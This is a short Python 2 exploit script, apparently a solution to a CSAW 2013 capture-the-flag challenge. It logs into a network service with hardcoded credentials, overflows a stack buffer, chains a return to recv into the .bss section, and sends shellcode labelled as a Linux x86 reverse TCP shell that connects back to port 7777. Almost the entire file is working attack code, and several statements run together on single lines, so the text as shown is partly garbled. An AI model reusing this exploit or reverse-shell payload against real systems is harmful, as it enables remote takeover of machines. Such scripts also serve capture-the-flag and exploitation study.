from socket import *
from struct import *
from time import sleep
p = lambda x : pack("<L",x)up = lambda x : unpack("<L",x)[0]
HOST = "192.168.236.162" #local
PORT = 34266
buf_to_ret_offset = 0x41c+4
bss = 0x0804b008
recv_plt = 0x08048890
fd = 4
# /linux/x86/shell_reverse_tcp LHOST=192.168.236.162 LPORT=7777
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\xec" +\
"\xa2\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50\x51\x53\xb3" +\
"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +\
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
s=socket()
s.connect((HOST,PORT))
print s.recv(2048)
print s.recv(2048)
s.send("csaw2013")print s.recv(2048)
s.send("S1mplePWD")print s.recv(2048)
print s.recv(2048)
s.send("-1")sleep(1)
payload = "a" * buf_to_ret_offset
payload += p(recv_plt) + p(bss) + p(fd) + p(bss) + p(len(shellcode)) + p(0)
s.send(payload)
sleep(1)
s.send(shellcode)
s.close()